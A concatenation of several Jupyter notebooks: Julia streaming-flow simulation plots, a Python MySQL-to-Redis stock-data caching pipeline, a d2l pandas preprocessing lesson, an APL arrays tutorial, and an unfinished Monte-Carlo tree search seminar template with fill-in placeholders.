plot(thist,ω₂hist,label="DNS",ylim=(-30,30))
plot!(thist,ω₂ex(xeval,yeval,thist),label="Analytical")
xuedge, yuedge, xvedge, yvedge = coordinates(Edges(Primal,w₀),sys.grid)
xeval = xuedge[sampij[1]]
yeval = yuedge[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
u₂hist, v₂hist = velocity_history(sampij,w2hist,sys);
plot(thist,u₂hist,ylim=(-2,2),label="DNS")
plot!(thist,u₂ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
plot(thist,v₂hist,ylim=(-2,2),label="DNS")
plot!(thist,v₂ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
iplot = 380
println("Time/period = ",thist[iplot]/(2π))
usamp = (w1hist[iplot],w2hist[iplot],dX1hist[iplot],dX2hist[iplot],X̂hist[iplot])
rhs1samp = TimeMarching.r₁(usamp,thist[iplot])
rhs2samp = TimeMarching.r₂(usamp,thist[iplot]);
# #### The right-hand side of the second-order constraint equation
θ = range(0,2π,length=length(coords.u)+1)
plot(θ[1:end-1],rhs2samp[2].u,xlim=(0,2π),ylim=(-2,2),label="DNS",xlabel="θ")
plot!(θ[1:end-1],map((x,y) -> u₂ex(x,y,thist[iplot]),cos.(θ[1:end-1]),sin.(θ[1:end-1])),label="Analytical")
plot!(θ[1:end-1],rhs2samp[2].v,xlim=(0,2π),ylim=(-2,2),label="DNS",xlabel="θ")
plot!(θ[1:end-1],map((x,y) -> v₂ex(x,y,thist[iplot]),cos.(θ[1:end-1]),sin.(θ[1:end-1])),label="Analytical")
# #### History of RHS of second-order equation at sample point
sampij = (240,240) # indices of sample point
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
sin2eval = 2*sineval*coseval
reval
rhshist = nl_history(sampij,w1hist,sys);
itr = length(thist)-floor(Int,2π/(Ω*Δt))+1:length(thist)
using Statistics # for mean below (harmless if already loaded earlier in the notebook)
println("Mean value of DNS-computed RHS = ",Statistics.mean(rhshist[itr]))
println("Mean value analytical RHS = ",real(f₀(reval)/p.Re*sin2eval))
plot(thist,rhshist,label="DNS")
plot!(thist,real.(f₀(reval)/p.Re .+ g₀(reval)/p.Re*exp.(-2im*thist))*sin2eval,label="Analytical")
# #### Compute the drift streamfunction
#
# $\psi_d = \frac{1}{2} \overline{v_1 \times \Delta X_1}$
itr = length(thist)-floor(Int,2π/(Ω*Δt))+1:length(thist)
vx = zero(w₀)
vy = zero(w₀)
Xx = zero(w₀)
Xy = zero(w₀)
ψd = zero(w₀)
ψdhist = []
for (i,dX) in enumerate(dX1hist)
cellshift!((vx,vy),curl(sys.L\w1hist[i])) # -v₁, on the dual nodes
cellshift!((Xx,Xy),dX) # ΔX₁, on the dual nodes
ψd .= rmul!(Xx∘vy-Xy∘vx,0.5) # 0.5(v₁ × ΔX₁)
push!(ψdhist,ψd)
end
ψd .= average(ψdhist,itr);
# #### Plot the streamlines of the average
xg,yg = coordinates(w₀,sys.grid)
ψ̄₂d = deepcopy(ψ̄₂)
ψ̄₂d .+= ψd
plot(xg,yg,ψ̄₂d,levels=range(-0.2,0.1,length=31),clim=(1,2),xlim=(0,4),ylim=(0,4))
#plot!(xg,yg,ψ̄₂exfield,levels=range(-0.5,0.5,length=31),clim=(-2,-2),xlim=(0,4),ylim=(0,4))
plot!(body,fillcolor=:black,linecolor=:black)
|
examples/Streaming flow.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Building a Jupyter + MySQL + Redis Data Pipeline
#
# This requires running the **Full Stack** which uses the https://github.com/jay-johnson/sci-pype/blob/master/full-stack-compose.yml to deploy three docker containers on the same host:
#
# - MySQL (https://hub.docker.com/r/jayjohnson/schemaprototyping/)
# - Jupyter (https://hub.docker.com/r/jayjohnson/jupyter/)
# - Redis (https://hub.docker.com/r/jayjohnson/redis-single-node/)
#
# 
#
# ### Overview
#
# Here is how it works:
#
# 1. Extract and Transform the IBM pricing data
# - Extract the IBM stock data from the MySQL dataset and store it as a csv inside the **/opt/work/data/src/ibm.csv** file
# 1. Load the IBM pricing data with Pandas
# 1. Plot the pricing data with Matplotlib
# 1. Publish the Pandas Dataframe as JSON to Redis
# 1. Retrieve the Pandas Dataframe from Redis
# 1. Test the cached pricing data exists outside the container with:
# ```
# $ ./redis.sh
# SSH-ing into Docker image(redis-server)
# [root@redis-server container]# redis-cli -h localhost -p 6000
# localhost:6000> LRANGE LATEST_IBM_DAILY_STICKS 0 0
# 1) "(dp0\nS'Data'\np1\nS'{\"Date\":{\"49\":971136000000,\"48\":971049600000,\"47\":970790400000,\"46\":970704000000,\"45\":970617600000,\"44\":970531200000,\"43\":970444800000,\"42\":970185600000,\"41\":970099200000,\"40\":970012800000,\"39\":969926400000,\"38\":969
#
# ... removed for docs ...
#
# localhost:6000> exit
# [root@redis-server container]# exit
# exit
# $
# ```
#
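The caching steps above boil down to serializing the DataFrame as JSON and parsing it back on retrieval. A minimal pandas-only sketch of that round trip (no Redis involved; the column names mirror the IBM csv but the values are made up):

```python
import pandas as pd
from io import StringIO

# A tiny frame shaped like the extracted csv (made-up values)
df = pd.DataFrame({
    'Date': pd.to_datetime(['2000-10-10', '2000-10-09']),
    'Close': [113.0, 115.5],
})

# Serialize the way the notebook does before caching in Redis
payload = df.to_json()

# Restore on the consumer side and re-sort, mirroring the retrieval step
restored = pd.read_json(StringIO(payload)).sort_values(by='Date', ascending=False)
print(restored['Close'].tolist())
```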
# +
import os, sys, json, datetime
sys.path.insert(0, os.getenv('ENV_PYTHON_SRC_DIR', '/opt/work/src'))
from pycore import PyCore
# shell printing allows just lg('show log')
from common.shellprinting import *
from logger.logger import Logger
data_dir = os.getenv('ENV_DATA_SRC_DIR', '/opt/work/data/src')
ticker = 'IBM'
days_back = 10000 # all sticks in the db
output_file = str(data_dir) + '/' + ticker.lower() + '.csv'
def db_extract_stock_records(core, ticker, days_back, output_file):
try:
# Most of the SQLAlchemy calls below require some subset of these imports,
# so they are all included here for convenience:
from sqlalchemy import Column, Integer, String, ForeignKey, Table, create_engine, MetaData, Date, DateTime, Float, Boolean, cast, or_, and_, asc, desc
from sqlalchemy.orm import relationship, backref, scoped_session, sessionmaker, relation
from sqlalchemy.ext.declarative import declarative_base
# import the custom schema file
from databases.schema.db_schema_stocks import BT_Stocks
# Determine the dates based off the parameters:
right_now = datetime.datetime.now()
end_date_str = right_now
start_date_str = right_now - datetime.timedelta(days=days_back)
lg('Extracting Stock(' + str(ticker) + ') DaysBack(' + str(days_back) + ') Output(' + str(output_file) + ') Dates[' + str(start_date_str) + ' - ' + str(end_date_str) + ']', 6)
# Extract the records that match the Symbol and fall within the date range,
# then order them in descending order:
db_recs = core.m_dbs['STOCKS'].m_session.query(BT_Stocks).filter(and_( \
BT_Stocks.Symbol == str(ticker).upper(), \
(cast(BT_Stocks.Date, DateTime) >= start_date_str), \
(end_date_str >= cast(BT_Stocks.Date, DateTime)) )) \
.order_by(desc(BT_Stocks.id)) \
.limit(50) \
.all()
if os.path.exists(output_file):
os.system('rm -f ' + str(output_file))
# end of if there is something to remove before creating a new version
lg('Stock(' + str(ticker) + ') TotalRecords(' + str(len(db_recs)) + ')', 6)
with open(output_file, 'w') as csv_file:
csv_file.write('Date,Open,High,Low,Close,Volume\n')
total_recs = len(db_recs)
for idx,rec in enumerate(db_recs):
if idx % 100 == 0:
lg('Percent(' + str(core.get_percent_done(idx, total_recs)) + ') Rec(' + str(idx) + '/' + str(total_recs) + ')', 6)
# end of if need to print records
# Convert to strings:
date_str = rec.Date.strftime('%d-%b-%y')
open_str = '%0.2f' % float(rec.Open)
high_str = '%0.2f' % float(rec.High)
low_str = '%0.2f' % float(rec.Low)
close_str = '%0.2f' % float(rec.Close)
volume_str = str(int(rec.Volume))
# build the csv line string
line_str = str(date_str) \
+ ',' + str(open_str) \
+ ',' + str(high_str) \
+ ',' + str(low_str) \
+ ',' + str(close_str) \
+ ',' + str(volume_str)
# Write the csv line to the file with a newline character:
csv_file.write(line_str + '\n')
# end of all records
lg('Done Writing(' + str(total_recs) + ') Output(' + str(output_file) + ')', 6)
# end of writing output file
except Exception as e:
lg('ERROR: Failed to extract Stock(' + str(ticker) + ') Records with Ex(' + str(e) + ')', 0)
# end of try/ex
# end of db_extract_stock_records
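Incidentally, the manual comma-joining in the loop above can also be delegated to the standard-library csv module, which takes care of quoting and line endings for you (Python 3 sketch with a made-up row, not the actual database records):

```python
import csv
import io

header = ['Date', 'Open', 'High', 'Low', 'Close', 'Volume']
rows = [('10-Oct-00', '113.00', '115.50', '112.25', '113.00', '7600000')]

buf = io.StringIO()  # stands in for the open csv file
writer = csv.writer(buf)
writer.writerow(header)
writer.writerows(rows)
print(buf.getvalue())
```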
# Configure the core to connect to the redis server
# running inside the container and listening on port 6000
os.environ['ENV_DEPLOYMENT_TYPE'] = 'Test'
# Initialize the core that will connect to the other containers
core = PyCore()
# Extract and transform the records into a csv file
db_extract_stock_records(core, ticker, days_back, output_file)
if os.path.exists(output_file):
lg('Success File exists: ' + str(output_file), 5)
lg('')
lg('--------------------------------------------', 2)
lg('')
csv_file = output_file
lg('Processing ' + str(ticker) + ' data stored in CSV(' + str(csv_file) + ')', 6)
# Start loading the data
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# %matplotlib inline
import numpy as np
lg('Reading CSV with Pandas')
# handle date formats and the byte-order mark on the header row with utf-8-sig
dateparse = lambda x: pd.datetime.strptime(x, '%d-%b-%y')
data = pd.read_csv(csv_file, parse_dates=[0], date_parser=dateparse, encoding='utf-8-sig') \
.sort_values(by='Date', ascending=False)
lg('')
lg('Data Head with Sticks(' + str(len(data)) + ')', 1)
print data.head()
lg('', 6)
lg('-------------------------------------------------', 2)
lg('Creating Ticker(' + str(ticker) + ') Plot by Close Prices', 2)
lg('', 6)
# Set the size of the figure
plt.rcParams['figure.figsize'] = (15.0, 10.0)
all_dates = data.columns.values[0]
all_highs = data.columns.values[2]
all_closes = data.columns.values[4]
lg('Plotting the Data X-axis(' + str(all_dates) + ') Y-axis(' + str(all_closes) + ')', 5)
# Plot lines by referencing the dataframe keys
fig, ax = plt.subplots()
max_cell = len(data['Date']) - 1
start_date = str(data['Date'][0].strftime('%Y-%m-%d'))  # %m = month (%M would be minutes)
end_date = str(data['Date'][max_cell].strftime('%Y-%m-%d'))
ax.set_title(ticker + ' Pricing from ' + str(start_date) + ' to ' + str(end_date))
plt.plot(data['Date'], data['High'], color='red', label='High')
plt.plot(data['Date'], data['Low'], color='green', label='Low')
plt.plot(data['Date'], data['Close'], color='blue', label='Close')
plt.plot(data['Date'], data['Open'], color='orange', label='Open')
# Now add the legend with some customizations.
legend = ax.legend(loc='upper left', shadow=True, bbox_to_anchor=(0, 1.0))
# The frame is the matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
lg('', 6)
lg('-------------------------------------------------', 2)
lg('', 6)
# connect the core to the redis cache if it exists
cache_key = 'LATEST_' + ticker + '_DAILY_STICKS'
lg('Converting to JSON')
json_data_rec = data.to_json()
cache_this = {
'Ticker' : ticker,
'Data' : json_data_rec
}
lg('Caching the Ticker(' + ticker + ') Candlesticks')
results = core.purge_and_cache_records_in_redis(core.m_rds['CACHE'], cache_key, cache_this)
lg('')
lg('-------------------------------------------------', 2)
lg('')
# confirm we can retrieve the cached data without removing it from the cache:
lg('Retrieving Cached Ticker(' + ticker + ') Candlesticks')
cache_record = core.get_cache_from_redis(core.m_rds['CACHE'], cache_key)
lg('')
# the core will return a dictionary where 'Status' == 'SUCCESS' when it was able to pull
# records out of redis. After checking the 'Status', the dataset is stored under the 'Record' key.
if cache_record['Status'] == 'SUCCESS':
rec = cache_record['Record']
cache_data = rec['Data']
sticks = pd.read_json(cache_data).sort_values(by='Date', ascending=False)
lg(' - SUCCESS found cached records for Ticker(' + str(rec['Ticker']) + ')', 5)
lg('')
lg(' - Data Head with Sticks(' + str(len(sticks)) + ')')
print sticks.head()
else:
    lg('ERROR: Failed to retrieve Cached Candlesticks', 0)
# end of retrieving cache example
lg('')
else:
lg('Failed to Extract File', 0)
# did the extraction work or not
|
examples/example-db-extract-and-cache.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# + [markdown] origin_pos=0
# # Data Preprocessing
# :label:`sec_pandas`
#
# So far we have introduced a variety of techniques for manipulating data that are already stored in tensors.
# To apply deep learning to solving real-world problems,
# we often begin with preprocessing raw data, rather than those nicely prepared data in the tensor format.
# Among popular data analytic tools in Python, the `pandas` package is commonly used.
# Like many other extension packages in the vast ecosystem of Python,
# `pandas` can work together with tensors.
# So, we will briefly walk through steps for preprocessing raw data with `pandas`
# and converting them into the tensor format.
# We will cover more data preprocessing techniques in later chapters.
#
# ## Reading the Dataset
#
# As an example, we begin by creating an artificial dataset that is stored in a
# csv (comma-separated values) file `../data/house_tiny.csv`. Data stored in other
# formats may be processed in similar ways.
#
# Below we write the dataset row by row into a csv file.
#
# + origin_pos=1 tab=["mxnet"]
import os
os.makedirs(os.path.join('..', 'data'), exist_ok=True)
data_file = os.path.join('..', 'data', 'house_tiny.csv')
with open(data_file, 'w') as f:
f.write('NumRooms,Alley,Price\n') # Column names
f.write('NA,Pave,127500\n') # Each row represents a data example
f.write('2,NA,106000\n')
f.write('4,NA,178100\n')
f.write('NA,NA,140000\n')
# + [markdown] origin_pos=2
# To load the raw dataset from the created csv file,
# we import the `pandas` package and invoke the `read_csv` function.
# This dataset has four rows and three columns, where each row describes the number of rooms ("NumRooms"), the alley type ("Alley"), and the price ("Price") of a house.
#
# + origin_pos=3 tab=["mxnet"]
# If pandas is not installed, just uncomment the following line:
# # !pip install pandas
import pandas as pd
data = pd.read_csv(data_file)
print(data)
# + [markdown] origin_pos=4
# ## Handling Missing Data
#
# Note that "NaN" entries are missing values.
# To handle missing data, typical methods include *imputation* and *deletion*,
# where imputation replaces missing values with substituted ones,
# while deletion ignores missing values. Here we will consider imputation.
#
# By integer-location based indexing (`iloc`), we split `data` into `inputs` and `outputs`,
# where the former takes the first two columns while the latter only keeps the last column.
# For numerical values in `inputs` that are missing, we replace the "NaN" entries with the mean value of the same column.
#
# + origin_pos=5 tab=["mxnet"]
inputs, outputs = data.iloc[:, 0:2], data.iloc[:, 2]
inputs = inputs.fillna(inputs.mean())
print(inputs)
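For contrast, the deletion approach mentioned above can be sketched with `dropna` (an aside, not part of the original workflow; the frame below mimics the `inputs` split):

```python
import pandas as pd

inputs = pd.DataFrame({'NumRooms': [float('nan'), 2.0, 4.0, float('nan')],
                       'Alley': ['Pave', None, None, None]})

# Deletion: discard any row whose NumRooms entry is missing
dropped = inputs.dropna(subset=['NumRooms'])
print(dropped)
```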
# + [markdown] origin_pos=6
# For categorical or discrete values in `inputs`, we consider "NaN" as a category.
# Since the "Alley" column only takes two types of categorical values "Pave" and "NaN",
# `pandas` can automatically convert this column to two columns "Alley_Pave" and "Alley_nan".
# A row whose alley type is "Pave" will set values of "Alley_Pave" and "Alley_nan" to 1 and 0.
# A row with a missing alley type will set their values to 0 and 1.
#
# + origin_pos=7 tab=["mxnet"]
inputs = pd.get_dummies(inputs, dummy_na=True)
print(inputs)
# + [markdown] origin_pos=8
# ## Conversion to the Tensor Format
#
# Now that all the entries in `inputs` and `outputs` are numerical, they can be converted to the tensor format.
# Once data are in this format, they can be further manipulated with those tensor functionalities that we have introduced in :numref:`sec_ndarray`.
#
# + origin_pos=9 tab=["mxnet"]
from mxnet import np
X, y = np.array(inputs.values), np.array(outputs.values)
X, y
# + [markdown] origin_pos=12
# ## Summary
#
# * Like many other extension packages in the vast ecosystem of Python, `pandas` can work together with tensors.
# * Imputation and deletion can be used to handle missing data.
#
#
# ## Exercises
#
# Create a raw dataset with more rows and columns.
#
# 1. Delete the column with the most missing values.
# 2. Convert the preprocessed dataset to the tensor format.
#
# + [markdown] origin_pos=13 tab=["mxnet"]
# [Discussions](https://discuss.d2l.ai/t/28)
#
|
d2l-en/mxnet/chapter_preliminaries/pandas.ipynb
|
# -*- coding: utf-8 -*-
# Throughout this lesson there are snippets of code as examples. You are encouraged to edit and experiment with these – it will greatly improve your understanding.
#
# All data in APL resides in arrays. An array is a rectangular collection of numbers, characters and arrays, arranged along zero or more axes. Numbers and characters are 0 dimensional arrays, and are referred to as scalars. Characters are in single quotes.
#
# Creating a 1-dimensional array is very simple: just write the elements next to each other, separated by spaces. This syntax works for any data that you want in the array: numbers, characters, other arrays (etc.)
#
# A string is just a character vector, which may be written with single quotes around the entire string.
#
# Parentheses are used to group array items.
#
2 3 5 7 11
'A' 'P' 'L'
'APL'
(1 4 2) (4 3) (99 10)
# Numbers are very straightforward: a number is a number. It doesn't matter if it is an integer or not, nor if it is real or complex. Negative numbers are denoted by a 'high minus': `¯`. You can also use scientific notation with `e` (or `E`), so a million is `1E6`
#
# The items of an array can be of different types.
'Hello' 100 (1 'b' 2.5)
¯2 3e2 2e¯1
# An array has a rank and a depth.
# ## Depth
#
# The depth is the level of nesting. For example, an array of simple (i.e. non-nested) scalars has depth 1, an array containing only depth 1 arrays has depth 2, and a simple scalar (e.g. a number or character) has depth 0. However, for some arrays it's not so easy. An array may contain both vectors and scalars. In cases like this, the depth is reported as negative.
#
# You can find the depth of an array with the function `≡`.
≡ 1
≡ 'APL'
≡ ((1 2) (3 7)) ((99 12) (1 2 3) 'Hey')
≡ 1 'Hello' 33 'World'
# ## Rank
#
# The concept of rank is very important in APL, and isn't present in many other languages. It refers to the number of dimensions in the array. So far, we've only seen rank 0 arrays (scalars), and rank 1 arrays (vectors). You can, however, have arrays of other ranks. A rank 2 array, for example, is often called a matrix or a table.
#
# Arrays are always rectangular; each row of a matrix must have the same number of columns. Each layer of a 3D block must have the same number of rows and columns. As our screens are only two-dimensional, higher rank arrays are printed layer-by-layer.
#
# Creating arrays of ranks greater than 1 is only slightly harder than creating vectors. To do so we can use the function `⍴` (Greek letter "rho" for **r**eshape). It takes a vector of dimension lengths as a left argument and any array as a right argument. It returns a new array with the specified dimensions, filled with the data of the right argument. If there is too much data, the tail just doesn't get used. If there is too little, it gets recycled from the beginning.
2 2⍴1 2 3 4
2 3 2⍴1 0 0 1 1 1 0 1 1 0 0 1
3⍴5 4 3 2 1
3 4⍴'abc'
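For readers coming from Python, a rough NumPy analogy to this truncate-or-recycle behaviour of `⍴` is `np.resize`, which also repeats the data from the beginning when there is too little of it (the analogy is loose; APL's reshape is more general):

```python
import numpy as np

print(np.resize([1, 2, 3, 4], (2, 2)))  # exactly enough data
print(np.resize([5, 4, 3, 2, 1], 3))    # too much: the tail is dropped
print(np.resize([1, 2, 3], (2, 2)))     # too little: recycled from the start
```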
# It doesn't matter what the rank of the right argument of `⍴` is:
4 5⍴(3 4⍴'ABC')
# Matrices don't have to contain only scalars. Like vectors (and all other arrays), they can be nested.
3 2⍴(1 2)(3 4)(5 6)
2 2⍴(3 2⍴'x')(2 1⍴(2 2⍴0)(2 2⍴1))
# Depth is general to arrays of any rank. The depth of an array isn't just the nesting level of vectors, as shown previously, but of any array. So an array of depth-1 matrices has depth 2, and a matrix of numeric vectors also has depth 2. A matrix of scalars will have depth 1, like any array of scalars.
≡ (5 3⍴1 4 3 7)
≡ (2 2⍴0) (3 1 4⍴11)
≡ (7 7 7⍴(2 2⍴0) 'abc')
# Of course, all arrays of uneven depths are dealt with in the same way as vectors.
≡ (2 2⍴('APL' 360) 1 2)
# The depth of the previous example is `¯3` because the `'A'` in `'APL'` is at a depth of 3 and the depth of the array is uneven.
# APL also has empty arrays: `⍬` is the empty numeric array and `''` is the empty character array.
#
# The function `⍴` also has a meaning monadically, when applied to only one argument. It returns the shape of its argument - the lengths of its dimensions.
⍴ 'abcd'
⍴ (2 2 ⍴ 1 2 3 4)
⍴ ⍬
⍴ ''
# There is a distinction between single row matrices and vectors, even if they look the same when printed.
1 3⍴1 2 3
⍴ (1 3⍴1 2 3)
⍴ 1 2 3
# Note the identity: `X ≡ ⍴ (X ⍴ A)`. After reshaping an array with `X`, its shape will always be `X`.
# The length of the shape of an array is equal to its rank. Therefore, we can find the rank of an array with `⍴⍴` - the shape of the shape.
#
# Since a scalar is rank 0 (i.e. it has no dimensions), the shape of a scalar has length 0 and is an empty vector: `⍬`
⍴⍴ 'abc'
⍴⍴ (3 4 2 5⍴42)
⍴⍴ 'q'
⍴ 'b'
# You can use `⍴` to convert between a rank-0 scalar and a rank-1 vector. A scalar has shape `⍬` and a length 1 vector has shape `1`.
⍴⍴ (1⍴10)
⍴⍴ (⍬⍴(1⍴10))
|
Arrays.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
import gym
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# ## Seminar: Monte-carlo tree search
#
# In this seminar, we'll implement vanilla MCTS planning and use it to solve some Gym envs.
#
# But before we do that, we first need to modify the gym env to allow saving and loading game states, to facilitate backtracking.
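The wrapper below leans on the fact that, for a pickle-able environment, a snapshot can simply be the pickled bytes of the env: loading deserializes a fresh copy, so whatever happens afterwards cannot corrupt the saved state. A toy illustration of that idea with a stateful object standing in for a real gym env:

```python
from pickle import dumps, loads

class ToyEnv:
    """Stand-in for an environment: one integer of mutable state."""
    def __init__(self):
        self.t = 0
    def step(self):
        self.t += 1

env = ToyEnv()
env.step()

snapshot = dumps(env)   # save state at t == 1
env.step()
env.step()              # keep playing; t is now 3

env = loads(snapshot)   # backtrack: an independent copy of the saved state
print(env.t)
```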
# +
from gym.core import Wrapper
from pickle import dumps,loads
from collections import namedtuple
# a container for the get_result function below. Works just like a tuple, but prettier
ActionResult = namedtuple("action_result",("snapshot","observation","reward","is_done","info"))
class WithSnapshots(Wrapper):
"""
Creates a wrapper that supports saving and loading environemnt states.
Required for planning algorithms.
This class will have access to the core environment as self.env, e.g.:
- self.env.reset() #reset original env
- self.env.ale.cloneState() #make snapshot for atari. load with .restoreState()
- ...
You can also use reset, step and render directly for convenience.
- s, r, done, _ = self.step(action) #step, same as self.env.step(action)
- self.render(close=True) #close window, same as self.env.render(close=True)
"""
def get_snapshot(self):
"""
:returns: environment state that can be loaded with load_snapshot
Snapshots guarantee same env behaviour each time they are loaded.
Warning! Snapshots can be arbitrary things (strings, integers, json, tuples)
Don't count on them being pickle strings when implementing MCTS.
Developer Note: Make sure the object you return will not be affected by
anything that happens to the environment after it's saved.
You shouldn't, for example, return self.env.
In case of doubt, use pickle.dumps or deepcopy.
"""
self.render() #close popup windows since we can't pickle them
if self.unwrapped.viewer is not None:
self.unwrapped.viewer.close()
self.unwrapped.viewer = None
return dumps(self.env)
def load_snapshot(self,snapshot):
"""
Loads snapshot as current env state.
Should not change snapshot inplace (in case of doubt, deepcopy).
"""
assert not hasattr(self,"_monitor") or hasattr(self.env,"_monitor"), "can't backtrack while recording"
self.render(close=True) #close popup windows since we can't load into them
self.env = loads(snapshot)
def get_result(self,snapshot,action):
"""
A convenience function that
- loads snapshot,
- commits action via self.step,
- and takes snapshot again :)
:returns: next snapshot, next_observation, reward, is_done, info
Basically it returns next snapshot and everything that env.step would have returned.
"""
<your code here load,commit,take snapshot>
return ActionResult(<next_snapshot>, #fill in the variables
<next_observation>,
<reward>, <is_done>, <info>)
# -
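# The load → commit → re-snapshot sequence that `get_result` should perform can be sketched on a pickle-based toy environment (no gym needed; `ToyEnv` and the standalone `get_result` below are illustrative, not the assignment's solution):

```python
from pickle import dumps, loads
from collections import namedtuple

ActionResult = namedtuple("action_result",
                          ("snapshot", "observation", "reward", "is_done", "info"))

class ToyEnv:
    """Tiny stateful stand-in for a gym env: the state is just a step counter."""
    def __init__(self):
        self.t = 0
    def step(self, action):
        self.t += 1
        return self.t, 1.0, self.t >= 3, {}

def get_result(snapshot, action):
    env = loads(snapshot)                                # load snapshot
    obs, r, done, info = env.step(action)                # commit action via step
    return ActionResult(dumps(env), obs, r, done, info)  # take snapshot again

snap0 = dumps(ToyEnv())
res = get_result(snap0, action=0)
res2 = get_result(res.snapshot, action=0)
```

# Because the function never mutates the input snapshot, re-running it from `snap0` reproduces the same outcome, which is exactly the guarantee MCTS relies on.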
# ### try out snapshots:
#
# +
#make env
env = WithSnapshots(gym.make("CartPole-v0"))
env.reset()
n_actions = env.action_space.n
# +
print("initial_state:")
plt.imshow(env.render('rgb_array'))
#create first snapshot
snap0 = env.get_snapshot()
# +
#play without making snapshots (faster)
while True:
is_done = env.step(env.action_space.sample())[2]
if is_done:
print("Whoops! We died!")
break
print("final state:")
plt.imshow(env.render('rgb_array'))
plt.show()
# +
#reload initial state
env.load_snapshot(snap0)
print("\n\nAfter loading snapshot")
plt.imshow(env.render('rgb_array'))
plt.show()
# +
#get outcome (snapshot, observation, reward, is_done, info)
res = env.get_result(snap0,env.action_space.sample())
snap1, observation, reward = res[:3]
#second step
res2 = env.get_result(snap1,env.action_space.sample())
# -
# # MCTS: Monte-Carlo tree search
#
# In this section, we'll implement the vanilla MCTS algorithm with UCB1-based node selection.
#
# We will start by implementing the `Node` class - a simple class that acts like MCTS node and supports some of the MCTS algorithm steps.
#
# This MCTS implementation makes some assumptions about the environment; you can find those _in the notes section at the end of the notebook_.
assert isinstance(env,WithSnapshots)
class Node:
""" a tree node for MCTS """
#metadata:
parent = None #parent Node
value_sum = 0. #sum of state values from all visits (numerator)
times_visited = 0 #counter of visits (denominator)
def __init__(self,parent,action,):
"""
        Creates an empty node with no children.
        Does so by committing an action and recording the outcome.
:param parent: parent Node
:param action: action to commit from parent Node
"""
self.parent = parent
self.action = action
self.children = set() #set of child nodes
#get action outcome and save it
res = env.get_result(parent.snapshot,action)
self.snapshot,self.observation,self.immediate_reward,self.is_done,_ = res
def is_leaf(self):
return len(self.children)==0
def is_root(self):
return self.parent is None
def get_mean_value(self):
return self.value_sum / self.times_visited if self.times_visited !=0 else 0
def ucb_score(self,scale=10,max_value=1e100):
"""
        Computes the UCB-1 upper bound using the current value and visit counts of the node and its parent.
        :param scale: multiplies the upper bound; from the Hoeffding inequality, this assumes the reward range to be [0, scale].
:param max_value: a value that represents infinity (for unvisited nodes)
"""
if self.times_visited == 0:
return max_value
#compute ucb-1 additive component (to be added to mean value)
#hint: you can use self.parent.times_visited for N times node was considered,
# and self.times_visited for n times it was visited
U = <your code here>
return self.get_mean_value() + scale*U
#MCTS steps
def select_best_leaf(self):
"""
Picks the leaf with highest priority to expand
        Does so by recursively picking nodes with the best UCB-1 score until it reaches a leaf.
"""
if self.is_leaf():
return self
children = self.children
best_child = <select best child node in terms of node.ucb_score()>
return best_child.select_best_leaf()
def expand(self):
"""
Expands the current node by creating all possible child nodes.
Then returns one of those children.
"""
assert not self.is_done, "can't expand from terminal state"
for action in range(n_actions):
self.children.add(Node(self,action))
return self.select_best_leaf()
def rollout(self,t_max=10**4):
"""
Play the game from this state to the end (done) or for t_max steps.
On each step, pick action at random (hint: env.action_space.sample()).
        Compute the sum of rewards from the current state until the end of the rollout.
Note 1: use env.action_space.sample() for random action
Note 2: if node is terminal (self.is_done is True), just return 0
"""
#set env into the appropriate state
env.load_snapshot(self.snapshot)
obs = self.observation
is_done = self.is_done
<your code here - rollout and compute reward>
return rollout_reward
def propagate(self,child_value):
"""
Uses child value (sum of rewards) to update parents recursively.
"""
#compute node value
my_value = self.immediate_reward + child_value
#update value_sum and times_visited
self.value_sum+=my_value
self.times_visited+=1
#propagate upwards
if not self.is_root():
self.parent.propagate(my_value)
def safe_delete(self):
"""safe delete to prevent memory leak in some python versions"""
del self.parent
for child in self.children:
child.safe_delete()
del child
class Root(Node):
def __init__(self,snapshot,observation):
"""
creates special node that acts like tree root
:snapshot: snapshot (from env.get_snapshot) to start planning from
:observation: last environment observation
"""
self.parent = self.action = None
self.children = set() #set of child nodes
#root: load snapshot and observation
self.snapshot = snapshot
self.observation = observation
self.immediate_reward = 0
self.is_done=False
@staticmethod
def from_node(node):
"""initializes node as root"""
root = Root(node.snapshot,node.observation)
#copy data
copied_fields = ["value_sum","times_visited","children","is_done"]
for field in copied_fields:
setattr(root,field,getattr(node,field))
return root
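# For reference, the UCB-1 bonus hinted at in `ucb_score` is usually written as $\sqrt{2 \ln N / n}$, where $N$ is the parent's visit count and $n$ is the node's own. A standalone sketch (the function and argument names here are illustrative, not the assignment's solution):

```python
import numpy as np

def ucb1(mean_value, n_node, n_parent, scale=10, max_value=1e100):
    """UCB-1: exploitation term plus a scaled exploration bonus sqrt(2 ln N / n)."""
    if n_node == 0:
        return max_value  # unvisited nodes get infinite priority
    exploration = np.sqrt(2 * np.log(n_parent) / n_node)
    return mean_value + scale * exploration
```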
# ## Main MCTS loop
#
# With everything we have implemented so far, MCTS boils down to a trivial piece of code.
# +
def plan_mcts(root,n_iters=10):
"""
builds tree with monte-carlo tree search for n_iters iterations
:param root: tree node to plan from
    :param n_iters: how many select-expand-simulate-propagate loops to make
"""
for _ in range(n_iters):
node = <select best leaf>
if node.is_done:
node.propagate(0)
else: #node is not terminal
<expand-simulate-propagate loop>
# -
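# The select-expand-simulate-propagate loop above can be sketched as follows; `StubLeaf` is a minimal stand-in for `Node`, included only so the loop runs on its own (it is not part of the assignment):

```python
class StubLeaf:
    """Minimal stand-in for a tree node, just enough to exercise the loop."""
    def __init__(self):
        self.times_visited = 0
        self.is_done = False
    def select_best_leaf(self):
        return self
    def expand(self):
        return self
    def rollout(self):
        return 1.0
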